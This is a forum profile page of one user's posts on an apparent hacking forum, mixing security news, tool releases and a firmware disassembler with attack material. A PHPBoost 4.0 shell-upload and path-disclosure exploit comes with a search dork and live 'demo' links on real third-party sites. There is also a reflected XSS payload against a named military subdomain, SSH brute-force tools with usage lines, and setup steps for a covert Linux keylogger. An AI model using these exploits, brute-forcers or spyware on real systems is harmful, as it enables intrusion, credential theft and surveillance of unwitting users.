Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Everything posted by Fi8sVrs

  1. Fi8sVrs
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ### # Title : PHPBoost 4.0 <= (FileUpload/Disclosure) Multiple Vulnerabilities # Author : KedAns-Dz # E-mail : ked-h (@hotmail.com / @1337day.com) # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) # Web Site : www.1337day.com # FaCeb0ok : http://fb.me/Inj3ct0rK3d # TwiTter : @kedans # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com # Platform/CatID : php - remote - Multiple # Type : php - proof of concept - webapp 0day # Tested on : Windows7 # Download : [http://www.phpboost.com/download/download.php] # Vendor : [www.phpboost.com] ### # <3 <3 Greetings t0 Palestine <3 <3 # F-ck HaCking, Lov3 Explo8ting ! ######## [ Proof / Exploit ] ################|=> # Google Dork : --------------- = allintext:"Boost? par PHPBoost 4.0" # Start ... Create new User -------- = http://127.0.0.1/phpboost/user/?url=/registration/ # Remote File Upload : ---------------------- + Go to see News page => = http://127.0.0.1/phpboost/news/news.php + Post new news => = http://127.0.0.1/phpboost/news/management.php?new=1&cat=0 + Push Upload attatch , and upload you'r file/Shell ( ex k.txt ) ! proof img : (http://oi45.tinypic.com/ay2cs7.jpg) ! Find you'r file ex: = http://127.0.0.1/phpboost/upload/k.txt Demo : *************************************** http://asylumspecimens.olympe.in user : ked pass : 123456 http://asylumspecimens.olympe.in/upload/k.txt *********************************************** # Full Informations Disclosure : --------------------------------- = http://127.0.0.1/phpboost/user/?url=/../../KedAns ! You Get Error page , in page content you see some php.ini content like server information , and the full path ...etc proof img : (http://oi49.tinypic.com/2l00g.jpg) Demo's : ************************************************ http://shura-fansub.rd-h.com/user/?url=/../../KedAns http://asylumspecimens.olympe.in/user/?url=/../../KedAns ********************************************************** # Sp. GreetS t0 : Elite_Trojan & Evil-Dz & all Dz_Mafia Cr3w <3 #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]======== # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs #===================================================== PHPBoost 4.0 Shell Upload - Intelligent Exploit
  2. Fi8sVrs

    jRecorder

    Fi8sVrs posted a topic in Programare

    Author: Sajith Amma Description: jRecorder is a jQuery plugin to enable a flash recorder in your webpages. You DON'T need to have a flash streaming server or RED5 server to do this recording. Project Documentation: jRecorder - jQuery Plugin Example Implementation: jRecorder Example Author Domain: Programming Ideas, Logic, Tricks and Tips https://github.com/sythoos/jRecorder/
  3. Fi8sVrs
    forum animale - Google Search inchideti
  4. Fi8sVrs
    Authored: Blake Site: soldierx.com wdivulge is a tool designed to find and download hidden files from a webserver. This is most commonly pictures, but you can adjust the file definitions to bruteforce any type of file that you'd like. wdivulge technically falls under the definition of a web fusker. Download WDivulge Hidden File Web Scanner ? Packet Storm
  5. Fi8sVrs
    Recently, EHN received a news report from Tunisian Cyber Army and Al Qaida Electronic Army in which the hackers claimed to have infected the Pentagon administrator, as part of their on going operation called "#opBlackSummer". The attack was happened after hackers identified a reflected cross site scripting(XSS) vulnerability in one of the sub domain of Pentagon (g1arng.army.pentagon.mil). POC: g1arng.army.pentagon.mil/Programs/Pages/Default.aspx?Category="><script>alert("xss by tca and AQECA on pentagon")</script> The hacker managed to exploit this vulnerability for sending malicious payload to the admin of Pentagon. Hackers claims that they got success in infecting them. Hackers said they compromised some important file and steal cookies from the pentagon mail. The security breach was done with collaboration with Chinese hackers. At the time of writing, the vulnerability is not fixed. If the TCA claim is true, then this one will be the best example that demonstrate the severity of simple reflected xss. Yesterday, i have sent notification to Pentagon team about the vulnerability but there is no response from them. In another mail, the team said the have hacked the state.gov with SQL injection vulnerability. Source: Hackers infect Pentagon admin by exploiting XSS vulnerability | Hacking News | Security updates
  6. Fi8sVrs
    Privacy - Friends / Public / Only Me
  7. Fi8sVrs
    Coding Freedom The Ethics and Aesthetics of Hacking E. GRABRIELLA COLEMAN Contents: [I]ACKNOWLEDGMENTS[/I] INTRODUCTION: A TALE OF TWO WORLDS [B]PART I: HISTORIES[/B] CHAPTER 1: THE LIFE OF A FREE SOFTWARE HACKER CHAPTER 2: A TALE OF TWO LEGAL REGIMES [B]PART II: CODES OF VALUE[/B] CHAPTER 3: THE CRAFT AND CRAFTINESS OF HACKING CHAPTER 4: TWO ETHICAL MOMENTS IN DEBIAN [B]PART III: THE POLITICS OF AVOWAL AND DISAVOWAL[/B] CHAPTER 5: CODE IS SPEECH CONCLUSION: THE CULTURAL CRITIQUE OF INTELLECTUAL PROPERTY LAW EPILOGUE: HOW TO PROLIFERATE DISTINCTIONS, NOT DESTROY THEM [I]NOTES REFERENCES INDEX[/I] Download: http://www.filehost.ro/29348407/Coding_Freedom_epub/
  8. Fi8sVrs
    https://rstforums.com/forum/53795-poli-ia-desf-oar-12-perchezi-ii-n-r-ndul-hackerilor-rom-nia.rst#post358140
  9. Fi8sVrs
    Security Override - Hacking Challenges These challenges are designed to put your hacking skills to the test. For each challenge completed you will receive points based on the level of the challenge. The Scoreboard will keep track of your points so you know where you rank among other SecurityOverride members. Your profile will also be updated as challenges are completed to include your total points and a list of the challenges you have successfully completed. Welcome to wixxerd.com
  10. Fi8sVrs
    As you may have read, there’s been a recent uptick in large-scale security attacks aimed at U.S. technology and media companies. Within the last two weeks, the New York Times and Wall Street Journal have chronicled breaches of their systems, and Apple and Mozilla have turned off Java by default in their browsers. This week, we detected unusual access patterns that led to us identifying unauthorized access attempts to Twitter user data. We discovered one live attack and were able to shut it down in process moments later. However, our investigation has thus far indicated that the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords – for approximately 250,000 users. As a precautionary security measure, we have reset passwords and revoked session tokens for these accounts. If your account was one of them, you will have recently received (or will shortly) an email from us at the address associated with your Twitter account notifying you that you will need to create a new password. Your old password will not work when you try to log in to Twitter. Though only a very small percentage of our users were potentially affected by this attack, we encourage all users to take this opportunity to ensure that they are following good password hygiene, on Twitter and elsewhere on the Internet. Make sure you use a strong password – at least 10 (but more is better) characters and a mixture of upper- and lowercase letters, numbers, and symbols – that you are not using for any other accounts or sites. Using the same password for multiple online accounts significantly increases your odds of being compromised. If you are not using good password hygiene, take a moment now to change your Twitter passwords. For more information about making your Twitter and other Internet accounts more secure, read our Help Center documentation or the FTC’s guide on passwords. We also echo the advisory from the U.S. Department of Homeland Security and security experts to encourage users to disable Java on their computers in their browsers. For instructions on how to disable Java, read this recent Slate article. This attack was not the work of amateurs, and we do not believe it was an isolated incident. The attackers were extremely sophisticated, and we believe other companies and organizations have also been recently similarly attacked. For that reason we felt that it was important to publicize this attack while we still gather information, and we are helping government and federal law enforcement in their effort to find and prosecute these attackers to make the Internet safer for all users. Updated 4:47pm: Corrected detail on disabling Java in penultimate paragraph. Posted by Bob Lord (@boblord) Director of Information Security Via Twitter Blog: Keeping our users secure
  11. Fi8sVrs
    HostBox SSH is a SSH password/account scanner written in python. README 2.0 Install INSTALLING WXPYTHON ------------------- http://wiki.wxpython.org/InstallingOnUbuntuOrDebian INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko 3.0 Usage To run HB in GUI mode: --------------------- ./HostBox-SSH.py Should start the GUI, alt. try: "python HostBox-SSH.py" or "chmod +x HostBox-SSH.py && ./HostBox-SSH.py To run HB in Console mode: ------------------------- ./HostBox-SSH -h For help with command line options Command line options: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f] Username Options: -u user1,user2,user3.. || --ufile=usernames.txt Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt Break Options: -1: Break on account login -2: Break on server login Speed Options: -n for normal scan || -f for fast scan mode Examples: ./HostBox.py -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n This is running hostbox listing usernames and password settings on the commandline. -1 is break account testing when a login is found for that account. -n means normal scan speed. ./HostBox.py -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f This is running hostbox listing usernames and passwords from a textfile. -2 means the scanner will break testing the server when a login is found for that server. -f is for fast scan mode or multithreaded scan. "-username" and "blank" in the username/password spec tells the scanner to use the username as password / check for blank passwords. VISIT OSKAR STRIDSMAN'S IT RESOURCE -- StridsmanIT.wordpress.com -- HostBox-SSH 0.2 REPORT BUGS TO: https://stridsmanit.wordpress.com/ssh-scanner/ Download HostBox SSH 0.2 ? Packet Storm
  12. Fi8sVrs
    The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. Windows installer. Changes: An integrated add-ons marketplace, a new Ajax spider, Session scope, and various other features and improvements have been added. Download ZAP_2.0.0_Windows.exe (71 MB) Download ZAP_2.0.0_Mac_OS_X.zip (126.7 MB) Download ZAP_2.0.0_Linux.tar.gz (76.6 MB) Sources: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project Security Tool Files ? Packet Storm
  13. Fi8sVrs
    This python-based tool is a disassembler for the Atmel MARC4 (a 4 bit Harvard micro). marc4dasm.py #! /usr/bin/env python # marc4dasm.py - disassemble atmel marc4 # # Adam Laurie <adam@aperturelabs.com> # http://www.aperturelabs.com # # This code is copyright (c) Aperture Labs Ltd., 2013, All rights reserved. # # This code is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This code is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # import sys # Comments COMM= { 0x00:'Add the top 2 stack digits', 0x01:'Add with carry the top 2 stack digits', 0x02:"2's complement subtraction of the top 2 digits", 0x03:"1's complemen subtraction of the top 2 digits", 0x04:'Exclusive-OR top 2 stack digits', 0x05:'Bitwise-AND top 2 stack digits', 0x06:'Equality test for top 2 stack digits', 0x07:'Inequality test for top 2 stack digits', 0x08:'Less-than test for top 2 stack digits', 0x09:'Less-or-equal for top 2 stack digits', 0x0A:'Greater-than for top 2 stack digits', 0x0B:'Greater-or-equal for top 2 stack digits', 0x0C:'Bitwise-OR top 2 stack digits', 0x0D:'Copy condition code onto TOS', 0x0E:'Restore condition codes', 0x0F:"CPU in 'sleep mode', interrupts enabled", 0x10:'Shift TOS left into carry', 0x11:'Rotate TOS left through carry', 0x12:'Shift TOS right into Carry', 0x13:'Rotate TOS right through carry', 0x14:'Increment TOS', 0x15:'Decrement TOS', 0x16:'Decimal adjust for addition (in BCD arithmetic)', 0x17:"1's complement of TOS", 0x18:'Toggle Branch flag', 0x19:'Set Branch and Carry flag', 0x1A:'Disable all interrupts', 0x1B:'Read 4-bit I/O port to TOS', 0x1C:'Decrement index on return stack', 0x1D:'Return from interrupt routine; enable all interrupts', 0x1E:'Software interrupt', 0x1F:'Write TOS to 4-bit I/O port', 0x20:'Fetch an 8-bit ROM constant and performs an EXIT to Ret_PC', 0x21:'Fetch an 8-bit ROM constant and performs an EXIT to Ret_PC', 0x22:'Move (loop) index onto Return Stack', 0x23:'Copy (loop) index from the Return Stack onto TOS', 0x24:"Return from subroutine (';')", 0x25:"Return from subroutine (';')", 0x26:'Exchange the top 2 digits', 0x27:'Push a copy of TOS-1 onto TOS', 0x28:'Move top 2 digits onto Return Stack', 0x29:'Move top 3 digits onto Return Stack', 0x2A:'Copy 2 digits from Return to Expression Stack', 0x2B:'Copy 3 digits from Return to Expression Stack', 0x2C:'Move third digit onto TOS', 0x2D:'Duplicate the TOS digit', 0x2E:'Remove TOS digit from the Expression Stack', 0x2F:'Remove one entry from the Return Stack', 0x30:'Indirect fetch from RAM addressed by the X register', 0x31:'Indirect fetch from RAM addressed by preincremented X register', 0x32:'Indirect fetch from RAM addressed by the postdecremented X register', 0x33:'Direct fetch from RAM addressed by the X register', 0x34:'Indirect fetch from RAM addressed by the Y register', 0x35:'Indirect fetch from RAM addressed by preincremented Y register', 0x36:'Indirect fetch from RAM addressed by postdecremented Y register', 0x37:'Direct fetch from RAM addressed by the Y register', 0x38:'Indirect store into RAM addressed by the X register', 0x39:'Indirect store into RAM addressed by pre-incremented X register', 0x3A:'Indirect store into RAM addressed by the postdecremented X reg.', 0x3B:'Direct store into RAM addressed by the X register', 0x3C:'Indirect store into RAM addressed by the Y register', 0x3D:'Indirect store into RAM addressed by pre-incremented Y register', 0x3E:'Indirect store into RAM addressed by the post-decremented Y reg.', 0x3F:'Direct store into RAM addressed by the Y register', 0x70:'Fetch the current Expression Stack Pointer', 0x71:'Fetch current Return Stack Pointer', 0x72:'Fetch current X register contents', 0x73:'Fetch current Y register contents', 0x74:'Move address into the Expression Stack Pointer', 0x75:'Move address into the Return Stack Pointer', 0x76:'Move address into the X register', 0x77:'Move address into the Y register', 0x78:'Set Expression Stack Pointer', 0x79:'Set return Stack Pointer direct', 0x7A:'Set RAM address register X direct', 0x7B:'Set RAM address register Y direct', 0x7C:'No operation', } # Zero Address Instructions ZAI= { 0x00:'ADD', 0x01:'ADDC', 0x02:'SUB', 0x03:'SUBB', 0x04:'XOR', 0x05:'AND', 0x06:'CMP_EQ', 0x07:'CMP_NE', 0x08:'CMP_LT', 0x09:'CMP_LE', 0x0A:'CMP_GT', 0x0B:'CMP_GE', 0x0C:'OR', 0x0D:'CCR@', 0x0E:'CCR!', 0x0F:'SLEEP', 0x10:'SHL', 0x11:'ROL', 0x12:'SHR', 0x13:'ROR', 0x14:'INC', 0x15:'DEC', 0x16:'DAA', 0x17:'NOT', 0x18:'TOG_BF', 0x19:'SET_BCF', 0x1A:'DI', 0x1B:'IN', 0x1C:'DECR', 0x1D:'RTI', 0x1E:'SWI', 0x1F:'OUT', 0x20:'TABLE', 0x21:'---', 0x22:'>R', 0x23:'I', 0x24:'---', 0x25:'EXIT', 0x26:'SWAP', 0x27:'OVER', 0x28:'2>R', 0x29:'3>R', 0x2A:'2R@', 0x2B:'3R@', 0x2C:'ROT', 0x2D:'DUP', 0x2E:'DROP', 0x2F:'DROPR', 0x30:'[X]@', 0x31:'[+X]@', 0x32:'[X-]@', 0x34:'[Y]@', 0x35:'[+Y]@', 0x36:'[Y-]@', 0x38:'[X]!', 0x39:'[+X]!', 0x3A:'[X-]!', 0x3C:'[Y]!', 0x3D:'[+Y]!', 0x3E:'[Y-]!', 0x70:'SP@', 0x71:'RP@', 0x72:'X@', 0x73:'Y@', 0x74:'SP!', 0x75:'RP!', 0x76:'X!', 0x77:'Y!', 0x7C:'NOP', 0x7D:'---', 0x7E:'---', 0x7F:'---', } # Long RAM Address Instructions (INS $XX) LRAI= { 0x33:'[>X]@', 0x3B:'[>X]!', 0x3F:'[>Y]!', 0x37:'[>Y]@', 0x78:'>SP', 0x79:'>RP', 0x7A:'>X', 0x7B:'>Y', } # CALL $nXX CALL= { 0x40:'CALL', 0x41:'CALL', 0x42:'CALL', 0x43:'CALL', 0x44:'CALL', 0x45:'CALL', 0x47:'CALL', 0x48:'CALL', 0x49:'CALL', 0x4A:'CALL', 0x4B:'CALL', 0x4C:'CALL', 0x4D:'CALL', 0x4E:'CALL', 0x4F:'CALL', } # BRANCH $nXX BRANCH= { 0x50:'BRA', 0x51:'BRA', 0x52:'BRA', 0x53:'BRA', 0x54:'BRA', 0x55:'BRA', 0x56:'BRA', 0x57:'BRA', 0x58:'BRA', 0x59:'BRA', 0x5A:'BRA', 0x5B:'BRA', 0x5C:'BRA', 0x5D:'BRA', 0x5E:'BRA', 0x5F:'BRA', } # LITERAL 0-F LIT= { 0x60:'LIT_0', 0x61:'LIT_1', 0x62:'LIT_2', 0x63:'LIT_3', 0x64:'LIT_4', 0x65:'LIT_5', 0x66:'LIT_6', 0x67:'LIT_7', 0x68:'LIT_8', 0x69:'LIT_9', 0x6A:'LIT_A', 0x6B:'LIT_B', 0x6C:'LIT_C', 0x6D:'LIT_D', 0x6E:'LIT_E', 0x6F:'LIT_F', } # Fixed ROM addresses ROMADD= { 0x000:'$AUTOSLEEP', 0x008:'$RESET', 0x040:'INTERRUPT_0', 0x080:'INTERRUPT_1', 0x0C0:'INTERRUPT_2', 0x100:'INTERRUPT_3', 0x140:'INTERRUPT_4', 0x180:'INTERRUPT_5', 0x1C0:'INTERRUPT_6', 0x1E0:'INTERRUPT_7', } # Variables in RAM (as yet unknown) RAMADD= { } # Short branch inside current page: 0x80 - 0xBF (SBRA $XXX) # dealt with entirely in later code # Short subroutine CALL into 'zero page': 0xC0 - 0xFF (SCALL $XXX) # dealt with entirely in later code # setup if len(sys.argv) < 2: print print 'usage: %s <INFILE> [QUIET]' % sys.argv[0] exit() def print_with_comment(address, data, ins, arg, comment): global Quiet if arg != None: arg= '%02X' % arg else: arg= ' ' if not Quiet: address= '%04X ' % address original= '%02X %s ' % (ins, arg) else: address= '' original= ' ' pad= ' ' * (40 - len(data)) if comment: print '%s%s %s %s \\ %s' % (address, original, data, pad, comment) return if COMM.has_key(ins): print '%s%s %s %s \\ %s' % (address, original, data, pad, COMM[ins]) else: print '%s%s %s %s \\ %s' % (address, original, data, pad, 'Illegal instruction!') # start main code infile= open(sys.argv[1],'r') Quiet= False if len(sys.argv) == 3: if sys.argv[2].upper() == 'Q': Quiet= True data= infile.read() infile.close() # first pass - create labels p= 0 label= 0 rams= 0 # last two bytes are CRC while p < len(data) - 2: x= ord(data[p]) p += 1 # skip over instructions that have no args or implicit addresses if ZAI.has_key(x) or LIT.has_key(x): continue # create address labels for everything else... if CALL.has_key(x) or BRANCH.has_key(x): address= ord(data[p]) address += (x & 0x0f) << 8 p += 1 if ROMADD.has_key(address): continue ROMADD[address]= 'LABEL_%03X' % label label += 1 continue if LRAI.has_key(x): address= ord(data[p]) p += 1 if RAMADD.has_key(address): continue RAMADD[address]= 'VAR_%02X' % rams rams += 1 continue # Short branch inside current page if x >= 0x80 and x <= 0xBF: # current page is 64 bytes address= p - (p % 64) + (x - 0x80) # Short subroutine CALL into 'zero page' if x >= 0xC0 and x <= 0xFF: # ROM is 64 evenly spaced addresses between 0x00 and 0x1F8) address= (x - 0xC0) * (0x200 / 64) if ROMADD.has_key(address): continue ROMADD[address]= 'LABEL_%03X' % label label += 1 continue # second pass - look for orphan code (chunks of code that is never directly called) p= 1 orphan= 0 while p < len(data) - 2: x= ord(data[p]) prev= ord(data[p - 1]) # previous instruction was UNUSED, EXIT or RTI if x != 0xC1 and (prev == 0xC1 or prev == 0x25 or prev == 0x1D) and not ROMADD.has_key(p): ROMADD[p]= 'ORPHAN_%03X' % orphan orphan += 1 p += 1 # output addresses print '\\' print '\\' print '\\ %s' % sys.argv[1] print '\\' print '\\' print '\\ ROM ADDRESS LABEL' print '\\' for address in sorted(ROMADD.iterkeys()): print '\\ $%03X %s' % (address, ROMADD[address]) print '\\' print '\\' print '\\' print '\\ RAM VARIABLE LABEL' print '\\' for address in sorted(RAMADD.iterkeys()): print '\\ $%02X %s' % (address, RAMADD[address]) print '\\' print '\\' print '\\' print '\\' # third pass - disassemble p= 0 while p < len(data) - 2: ins= ord(data[p]) arg= None code_add= p # print labels if ROMADD.has_key(p): if not Quiet: out= '%04X\n' % p out += '%04X ORIGIN $%03X\n' % (p, p) out += '%04X : %s' % (p,ROMADD[p]) else: out= '\n' out += 'ORIGIN $%03X\n' % p out += ': %s' % ROMADD[p] print out # Zero Address Instructions if ZAI.has_key(ins): p += 1 print_with_comment(code_add, ZAI[ins], ins, arg, '') continue # Long RAM Address Instructions (INS $XX) if LRAI.has_key(ins): p += 1 arg= ord(data[p]) p += 1 out= '%s %s' % (LRAI[ins], RAMADD[arg]) print_with_comment(code_add, out, ins, arg, '') continue # CALL $nXX if CALL.has_key(ins): p += 1 arg= ord(data[p]) p += 1 address= ((ins & 0x0f) << 8) + arg out= '%s %s' % (CALL[ins], ROMADD[address]) print_with_comment(code_add, out, ins, arg, 'Unconditional long CALL ($%03X)' % address) continue # BRANCH $nXX if BRANCH.has_key(ins): p += 1 arg= ord(data[p]) p += 1 address= ((ins & 0x0f) << 8) + arg out= '%s %s' % (BRANCH[ins], ROMADD[address]) print_with_comment(code_add, out, ins, arg, 'Conditional long branch ($%03X)' % address) continue # Literal if LIT.has_key(ins): p += 1 print_with_comment(code_add, LIT[ins], ins, arg, 'Push literal/constant $%01X onto TOS' % (ins & 0x0F)) continue # Short BRANCH inside current page if ins >= 0x80 and ins <= 0xBF: # current page is 64 bytes address= p - (p % 64) + (ins - 0x80) p += 1 out= 'SBRA %s' % ROMADD[address] print_with_comment(code_add, out, ins, arg, 'Conditional short branch in page ($%03X)' % address) continue # Short subroutine CALL into 'zero page' if ins >= 0xC0 and ins <= 0xFF: p += 1 # ROM is 64 evenly spaced addresses between 0x00 and 0x1F8) address= (ins - 0xC0) * (0x200 / 64) out= 'SCALL %s' % ROMADD[address] print_with_comment(code_add, out, ins, arg, 'Unconditional short CALL ($%03X)' % address) continue # code should never reach here! p += 1 print_with_comment(code_add, '???', ins, 'UNKNOWN') # check CRC (only we can't because we don't know algorithm!) crc0= ord(data[p]) p += 1 crc1= ord(data[p]) print print 'CRC: %02X %02X' % (crc0, crc1) Atmel MARC4 Disassembler ? Packet Storm https://github.com/ApertureLabsLtd/marc4dasm
  14. Fi8sVrs
    PokerAgent botnet was discovered in 2012 by ESET Security Research Lab, which is a Trojan horse designed to harvest Facebook log-on credentials, also collecting information on credit card details linked to the Facebook account and Zynga Poker player stats. According to latest report, the botnet is still active mostly in Israel and 800 computers were infected, where over 16194 Facebook credentials stolen. The Trojan is active with many variants and belongs to MSIL/Agent.NKY family. ESET reveal that, the Trojan is coded in C# language and easy to decompile. After deep analyse, team found that the bot connects to the C&C server. On command, Trojan access the Facebook account of victim and collects the Zynga Poker stats and number of payment methods (i.e. credit cards) saved in the Facebook account. Once collected, information sent back to the C&C server. The Trojan is downloaded onto the system by another downloader component. This downloader component was seen on the web and the victims have been fooled into downloading it. ESET tracking of the botnet revealed that at least 800 computers have been infected with the Trojan and that the attacker had at least 16194 unique entries in his database of stolen Facebook credentials by March 20, 2012. "We advise careful consideration before allowing a browser or other app to ‘remember’ passwords for sensitive services and before storing credit card details into any application (not only Facebook!)." ESET advice. Via PokerAgent botnet stole over 16,000 Facebook credentials - Hacking News
  15. Fi8sVrs
    [*] SSH_ Brute-force by MMxM Usage: ./ssh-crack.php <host> <user> <wordlist> Download: http://www.fileshare.ro/e29225522 Mirror: http://www.4shared.com/zip/F5gKTGjA/ssh-crack.html
  16. Fi8sVrs
    spy_tux - a simple keylogger for linux ======================================== compilation ------------- add the path of the "event" file of your keyboard (which is in "/dev/input/" folder. most probably it is "event3"), your "admin password", path of your ".data" file and path of your ".keys" file to the corresponding places in the source code and compile it using make commend. usage ------- after compiling it copy it to the "/usr/bin" directory using , sudo cp spy_tux /usr/bin and run it using "spy_tux" command on terminal. spy_tux then the key logger will be started. the key strocks will be recorded in the ".data" file. add this command as a start up application to start it corresponding. more info: http://www.inf0warri0r.blogspot.com tcg.galahena@gmail.com licenses: ---------- Copyright 2012 Tharindra Galahena This file is part of spy_tux. spy_tux is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or any later version. spy_tux is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with spy_tux. If not, see Licenses - GNU Project - Free Software Foundation (FSF). Download
  17. Fi8sVrs
    1. Exploit Development - Part 1 (Concepts) **This video and Part 2 Segment 1 are more lecture based videos** I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong 2. Exploit Development - Part 2a (Shellcode) Exploit Development - Part 2b (Shellcode) 3. Exploit Development - Part 3 (Fuzzing) 4. Exploit Development - Part 4 (Disassembly/Reversing) Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. 5. Exploit Development - Part 5a (Putting It All Together) Exploit Development - 5b (Putting It All Together)
  18. Fi8sVrs
    Hack.me is a FREE, community based project powered by eLearnSecurity. The community allows you to build, host and share vulnerable web application code for educational and research purposes. It aims to be the largest collection of “runnable” vulnerable web applications, code samples and CMS’s online. The platform is available without any restriction to any party interested in Web Application Security: students, universities, researchers, penetration testers and web developers. Features Upload your own code Online IDE for PHP & MySQL Your code hosted in the cloud FREE!! Practice webapp security Isolated enviroment Online: nothing to download! Safety Every time you run a new Hackme the site will initiate a new sandbox for you. You will get isolated access to it so that you will always know that the application is safe for you to use. No other students can add malware or exploits in your sandbox. This ensures 99% safety. What about the 1%? While the team makes the best effort to moderate every and each new web app uploaded on Hack.me, chances are that something can and will slip through. If you are not 100% comfortable to trust us or the Hackme developer, please just run new Hackmes from a virtual machine or from a non production OS. We have written about a variety of web apps where you can practice your hack-fu such as: Bodgeit Store Jarlsberg WackoPicko Damn Vulnerable Web Application (DVWA) Vicnum Metasploitable So head over to hack.me and see what you think: http://hack.me Hack.me - Build, Host & Share Vulnerable Web Application Code - Darknet - The Darkside
  19. Fi8sVrs
    iptables is built on top of netfilter, the packet alteration framework for Linux 2.4.x and 2.6.x. It is a major rewrite of its predecessor ipchains, and is used to control packet filtering, Network Address Translation (masquerading, portforwarding, transparent proxying), and special effects such as packet mangling. Changes: This release adds support for the Day Transition Ignore option in xt_time. Download Linux IPTables Firewall 1.4.17 ? Packet Storm
  20. Fi8sVrs
    Third Pwnium contest offers hackers a piece of the pie Google has announced the target for its third Pwnium hacking contest, to be held at this year's CanSecWest security conference, with $3.14159m in prize money for the researchers who can successfully crack its Chrome OS operating system. And yes, that figure is derived from the first six digits of ?. The contest, to be held on March 7, will see hackers trying to subvert the operating system on a base specification Samsung 550 Chromebook running Wi-Fi. Google is offering $110,000 for a browser or system level compromise delivered via a web page, and $150,000 if the crack survives a reboot of the system. In order to claim the cash, researchers must provide Google with the full list of vulnerabilities used in the attack, along with any code used. Partial prizes will be offered for semi-successful hacks, at the Chocolate Factory's discretion. "We believe these larger rewards reflect the additional challenge involved with tackling the security defenses of Chrome OS, compared to traditional operating systems," said Chris Evans of the Google Chrome security team in a post on the Chromium blog. Google is already sponsoring the other hacking contest at the conference, Pwn2Own, and is putting its Chrome browser in the firing line with a $100,000 for a successful exploit – plus the laptop that the browser is successfully cracked on. While the prize money for both contests has never been higher, it's still a very good deal for Google and others who are stumping up the cash. Time and again the security industry has found holes in commercial code that the writers never even dreamed of, and splashing out a few million is well worth it if Google can bolster its defenses further. The company offered $1m for its first Pwnium contest, and upped that to $2m last year at the second competition at the Hack in the Box conference in Kuala Lumpur. But the Chocolate Factory is unlikely to pay out the full amount this time, since Chrome OS should prove more difficult to crack than Google's browser. When Google launched the Chrome OS, it boasted that the operating system was the most secure on the market, saying the mix of hardware and software modules on the machines makes a lot of current attack techniques invalid. That said, the research community has been known to pull some major surprises, and Google might face a bigger payday than it anticipates. ® Via Google offers $3.14159 MILLION in prizes for hacking Chrome OS • The Register
  21. Fi8sVrs
